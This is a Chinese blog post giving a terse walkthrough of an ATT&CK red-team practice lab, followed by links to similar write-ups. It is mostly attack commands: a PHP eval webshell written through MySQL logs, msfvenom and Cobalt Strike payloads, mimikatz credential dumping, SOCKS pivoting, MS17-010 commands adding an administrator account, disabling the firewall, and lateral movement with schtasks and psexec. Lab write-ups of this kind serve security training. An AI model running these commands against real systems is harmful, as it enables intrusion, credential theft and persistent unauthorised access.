红日ATT&CK系列靶场(-)简记

已于 2023-06-20 18:40:57 修改
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全之路 文章标签: 网络安全
于 2023-06-20 17:53:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhoufeiy/article/details/131307278
版权

Step 1>》信息收集

nmap 发现80、 3306

nmap -T4 -O 192.168.92.100

访问80端口

dirsearch(御剑)扫描

发现:/phpMyadmin

Step 2 》漏洞利用

1.弱口令

http://192.168.92.100/phpMyadmin

root/root 登录成功

2.getshell

select @@basedir //查绝对路径

into outfile 写马

select '<?php eval($_POST[cmd]);?>' into outfile 'C://绝对路径/shell.php';

FAILED

 尝试 MySQL日志马

开启全局日志

SET Global_general_log='on' //开启

show variables like '%general%' //验证

set global general_log_file='绝对路径/log.php' //设置日志文件

写马:

select "<?php eval($_POST['cmd']);?>"

ANTSword连接马log.php

Step 3》yxcms漏洞

信息泄露 admin/123456

模板内写马

antSword 连接成功

------------------------------

Step 4》 

msfvenom 生成马 shell.exe

use exploit/multi/handler  #监听

./shell.exe  //执行shell.exe

提权:

meterpreter>shell

whoami //为system权限

Step 5>

Cobalt strike 

建立监听(beacon http)

生成 exe马cs-> attacks->packages->win Executable->x64->cs.exe

./cs.exe

---

sleep 1 #交互时间

Step 6》密码、信息收集

shell ipconfig

shell whoami

shell net config workstation

host->Access->Run mimikatz //获取pass

access->Elevate #账户提权

Step7 》 MSF->CS 

sessions -i

exploit/windows/local/payload_inject

set session 1

CS getshell成功

sleep 1

--

Step 8》CS->MSF(监听7777)

new listener->foreign http(7777)

spawn->foreign/reverse_http(7777)

---

Step 9 》

socks 通过cs将msf带入内网

host->pivoting->socks sever->1080

setg Proxies socks4:192.168.92.130:1080

---------

--msf6->setg Proxies socks4:192.168.92.130:1080

use auxiliary/scanner/smb/smb_version

show  options

set rhosts 192.168.52.0/24

set threads 64

run

内网开放445->盲猜ms17_010漏洞

Step 10》

内网信息收集

CS->

systeminfo //系统信息,发现4个补丁

net view

---

run post/windows/gather/enum_applications //安装软件信息

--

socks 反向代理

run post/multi/manage/autoroute

run autoroute -p

backgroud

use auxiliary/server/socks_proxy

set version 4a

set srvhost 127.0.0.1

run

jobs

利用MSF ARP模块扫描52网段

use post/windows/gather/arp_scanner

set rhost 192.168.52.0/24

set sessions 1

run

CS arp扫描

shell arp -a

----

->meterpreter->getsystem

whoami

netsh advfirewall set allprofiles state off #关闭防火墙

-

nmap vuln漏洞扫描

nmap --script-vuln 192.168.92.100

msf 辅助模块扫描-->search ms17_010

use 3

show options

set rhost 192.168.52.143

----

CS上利用目标机上的nmap (上传nmap.exe)对内网其他主机进行扫描

nmap --script-vuln 192.168.52.141

open port scan

Step 11>内网攻击

msf CS联动

use auxiliary/admin/smb/ms17_010_command

set command net user test test123 /add

run

set command net localgroup administrators test test123 /add

run

--23端口 telnet 服务上传漏洞,ms17_010 开启23端口telnet

set command sc config tlntsvr start=auto

run

set command net start telnet

run

set command netstat -an

run

--telnet连接

use auxiliary/scanner/telnet/telnet_login

set username test

set password test123

set rhost 192.168.52.138

run

----

ms08_068

socks 将 msf带入内网后利用ms08_068

use auxiliary/scanner/smb/smb_version

search ms08_067

use 0

run

SMB 远程桌面密码猜测:

use exploit/multi/handler

search smb_login

use 0

set rhosts 192.168.52.141

set smbpass test@123

set smbdomain god

set smbuser administrator

run

横向移动-----

msf-CS联动,在win7上连接C盘

meterpreter->shell

net use \\192.168.52.138\c$ 'test123' /user:"administrator"

dir \\192.168.52.138

copy c:\phpstudy\www\shell.exe \\192.168.52.138\c$

schtasks /create /tn "godunt" /tr C:\shell.exe /sc once /st 12:45 /S 192.168.52.138 /RU System /u administrator /p "test123"

---

CS->psexec 模块进行横向移动

new listener->becon SMB->save

host->jump->psexec->

administrator

test123

god.org

beacon smb

administrator * via 192.168.92.100@3756

lunch

关云chnag
关注
专栏目录
ATT&CK实战系列-红队实战(一)vulnstack 红日靶场
weixin_68652890的博客
05-20 1806
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
红日靶场-ATT&CK实战系列-红队评估(一)
m0_66638011的博客
06-21 1236
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
热门推荐
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
ATT&CK实战系列-红队实战(二) 红日靶场
shulao2010的博客
05-21 820
如何通过一个简单的web漏洞,打开通往内网的大门
ATT&CK实战系列-Vulnstack三层网络域渗透靶场(一)
最新发布
M372109150的博客
09-22 1399
本篇为红日安全的ATT&CK实战系列-红队评估 (一)Vulnstack三层网络域渗透靶场靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
ATT&CK实战系列-红队评估 (红日靶场1)Vulnstack三层网络域渗透靶场
qq_47289634的博客
07-07 462
换个思路,这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。开启它,设置general_log为on,并且把日志存放路径设置为网站根目录,这样就可以写入shell了。保证kali和本机可以访问win7,给win7配置两块网卡,让win7既可以访问外网,也可以访问内网。
ATT&CK实战系列-红队评估 (一)Vulnstack三层网络域渗透
lizhiiiii的博客
08-03 1388
Vulnstack红日内网域渗透靶场1实战
ATT&CK实战系列-红队评估(一)
v2ish1yan的博客
02-26 898
这个靶场的流程,就是外网渗透拿到主机shell扫描内网存活主机,并查看是否存在历史漏洞使用内网代理和路由转发来对内网主机进行攻击应该还有很多思路,这个是比较简单的靶场,继续加油。
Vulnstack内网靶场渗透(ATT&CK实战系列-红队评估(七))
DG_s1mple
04-18 6556
这么久没打vulnhub全是因为在吃这一套内网靶场(绝对没有在摸鱼 ),现在把我的思路写下来 前言 这是Vulnstack里的一套靶场ATT&CK实战系列-红队评估(七) 这是靶场的链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 网络环境 整个靶场环境一共五个靶机(总共27.8 GB),分别位于三层网络环境中: DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192
ATT&CK红队评估(红日靶场1)
qq_61343559的博客
09-07 1123
红日靶场1练习
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
实战ATT&CK攻击链路--靶场Writeup(一)
Ms08067安全实验室
10-25 880
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限...
127.0.0.1、localhost及本机IP的理解
zhoufy的博客
06-08 3106
1、localhost是域名,du127.0.0.1是IP地址。 你可以打开 windows 安装zhi目录下的 etc 文件dao夹中的 hosts 文件,里面就有一句 127.0.0.1 localhost ;绑定IP4下 localhost 指向的IP地址 ::1 localhost ;绑定IP6下 localhost 指向的IP地址 2、本机 IP 就是本机对外放开访问的IP地址。 这个网址就是与物理网卡绑定的IP地址,比如,你可以给你的网卡设置I...
三层交换机实验演示
zhoufy的博客
07-30 1595
三层交换机实验 实验拓扑图如下: 实验步骤: 1、配置trunk 三层交换机以下的虚线连接的端口全部配置为trunk 重要命令: switchport trunk encapsulation dot1Q sw m t 2、vtp 在一台三层交换机中配置即可 命令: vtp domain v //v(域名) 3、vlan添加 ...
ATT&CK 红日靶场(三)-简记
zhoufy的博客
06-21 1067
端口目录访问 ip/1.php -->根目录、禁用函数!!!-------IP/configuration.php~-->>发现 testuser / cvcvgjASD!更改密码->>123456Step 》写马->>eval($_POST['123']);-》访问error.php--antsward 连接后无法执行命令:antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF。
telnet用户名密码爆破
zhoufy的博客
02-24 809
攻击机:kali 攻击模块:msfconsole -> use auxliary/scanner/telnet/telnet_login show options msf5 auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.8.35 rhosts => 192.168.8.35 msf5 auxiliary(scanner/telnet/telnet_login) > set user_file ...
telnet认证过程抓包分析
zhoufy的博客
02-24 550
window 10 -》开启telnet client cmd ——> telnet ->? -> telnet 192.168.8.35 wireshare抓包:telnet---》逐条分析
构建与运营企业内部ATT&CK框架
"本文档主要讨论了如何在企业内部建立和运营ATT&CK框架,以及其更新和路线图。ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值